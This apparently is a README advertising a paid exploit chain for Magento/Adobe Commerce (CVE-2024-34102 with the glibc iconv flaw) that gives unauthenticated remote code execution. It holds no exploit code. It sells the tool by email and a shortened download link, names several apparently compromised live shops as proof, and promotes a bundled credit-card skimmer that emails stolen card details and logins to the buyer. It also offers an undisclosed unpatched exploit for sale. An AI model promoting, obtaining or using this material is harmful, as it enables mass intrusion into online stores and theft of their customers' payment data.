CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce# CVE-2024-34102-RCE [](https://hits.seeyoufarm.com)
<br>
CVE-2024-34102 unauthenticated RCE PoC for Magento/adobe commerce<br>
any question related to the exploit and payment will be answered here: etx_arny@proton.me
please don't ask me give you for free(nothing comes for free), or the exploit not works, you can find all the necessary `how to's` inside the script while running it.
do as it says and it'll works if it didnt work then it means the fcuking target is not vulnerable, so be wise before mailing me.
CVE-2024-34102 is a file read vulnerability in Magento/adobe commerce which can be chained with CVE-2024-2961 to achieve unauthenticated RCE.<br>
# PROOFS:
as always everyone is interested to ask about proof so here it is: <br>
https://hushpuppies.appscentral.net/etx_arny.txt <br>
https://hawana-store.zerooneecommerce.com/etx_arny.txt <br>
http://store.datek.co.uk/etx_arny.txt <br>
https://naturalcuriosities.com/etx_arny.txt <br>
# FAQ's:
(Does it requires authentication?) NO it Does'nt<br>
(why it gives error time out?).<br>
'casue the the target not responded in specified wait time in 'timeout='. you can increase the value from '10' to '15'.<br>
(How many shells I can get with this?) 100k lol I dont know it depends to the list of the targets, if all of them are vulnerable then you'll get that amount of shells.<br>
(Can I get it for FREE?) I asked the same from the owner of my appartment 'if I can stay for free', He laughed and said NO.<br>
# WARNING:
Please confirm the links via the email provided below to avoid future problems...<br>
etx_arny@proton.me <br>
still if you got scammed by scammers then its on you.<br>
cause I always provide the clients the latest video prove with their chossed `STRING` mentioned inside the video<br>
which prevent all these F$cking scammers out the deal.<br>
# NEW:
as was promissed we come with a new RCE approach which is deffirent than this vulnerablity which is not yet disclosed.<br>
NO PATCH AVAIL<br>
NO WORK ARROUND<br>
NO CVE<br>
NO PUBLIC INFO<br>
NOTE: only serious deals will be accepted... <br>
We will provide only 3 sales atm you can only get it after contacting us via the email etx_arny@proton.me .<br>
worth to mention that we DONT have any TELEGRAM account and/or any social media accs<br>
so whatever you see is just scam, skids , leechers , bugs, CLOWNS... <br>
# EXPLOIT:
Those who dont know about iconv() vulnerability in glibc which is the core part for this exploit
thats all you need to know about this exploit and the file read (CVE-2024-34102) which is the gateway for iconv() to acheive unauthenticated RCE.
# [Download here](https://bit.ly/3Wops4y)
this is a chained exploit for Magento to achieve RCE/shell upload
which the python exploit is developed to upload shell / execute command on affected Magento installations
with capability of multi-targeting for both (shell upload / command execution),
credit card skimmer for post exploitation which logging the card details and send it to your email address(can be set in CC-skimmer.php)
also logging username and password with logged IP's, all logged data would be send to the email address defined in "CC-skimmer.php"
# [Download here](https://bit.ly/3Wops4y)
[4.0K] /data/pocs/bd2d0f5bc081e08c3abb7987da14aa85afe81d06
├── [1.5M] PoC.gif
└── [3.4K] README.md
0 directories, 2 files